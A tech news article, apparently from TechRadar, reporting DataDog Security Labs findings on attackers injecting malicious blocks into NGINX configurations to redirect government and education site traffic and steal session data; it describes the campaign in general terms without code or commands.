- DataDog reports that attackers have hijacked NGINX configurations to redirect traffic through malicious infrastructure.
- The campaign targets Asian government and education sectors, enabling the theft of session tokens, cookies and credentials.
- Hijacked traffic used for phishing, malware injection, ad fraud, and other proxy attacks
Cybercriminals are targeting NGINX servers and redirecting legitimate traffic through their malicious infrastructure, experts have warned.
Security researchers at DataDog Security Labs found that attackers are primarily focused on Asian targets in the government and education sectors.
NGINX servers are software systems that sit in front of websites or applications and handle incoming web traffic. They serve content, balance loads, and route requests to the appropriate backend servers.
What to do with stolen data
During the attack, anonymous threat actors modify NGINX configuration files and inject malicious blocks that fetch incoming requests. They then rewrite them to include the original URL and redirect traffic to domains under their control. According to DataDog, it is a five-stage attack that begins with configuration injection and ends with data exfiltration.
Since no vulnerabilities are exploited here and victims always end up on the pages they requested, no one is any the wiser. However, cybercriminals steal valuable information that can be used in different ways.
Since headers are preserved, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, this data is particularly valuable.
They can also manipulate content selectively. Since only certain URL paths are hijacked, the attacker can inject ads, phishing pages, malware downloads, or fake login prompts only when they want, successfully targeting specific users, regions, or time zones.
Then there is the option of monetizing and reselling traffic. Clean, real user traffic routed through an attacker’s infrastructure can be sold for ad fraud, SEO manipulation, click fraud, or used to boost other malicious services, which is a common practice in large-scale proxy ecosystems.
Finally, compromised NGINX servers can be used to proxy attacks against other targets, effectively hiding their origins.
Via BeepComputer
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
